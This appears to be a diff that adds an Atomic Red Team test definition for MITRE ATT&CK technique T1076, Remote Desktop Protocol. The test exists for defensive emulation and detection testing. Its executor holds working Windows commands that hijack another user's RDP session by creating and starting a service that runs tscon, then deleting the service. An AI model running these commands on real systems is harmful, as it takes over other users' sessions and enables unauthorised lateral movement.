T1076

T1076 shipment

atomics/T1076/T1076.yaml

@@ -0,0 +1,20 @@
+---
+attack_technique: T1076
+display_name: Remote Desktop Protocol
+
+atomic_tests:
+- name: RDP
+  description: |
+    RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
+
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    command: |
+      query user
+      sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
+      net start sesshijack
+      sc.exe delete sesshijack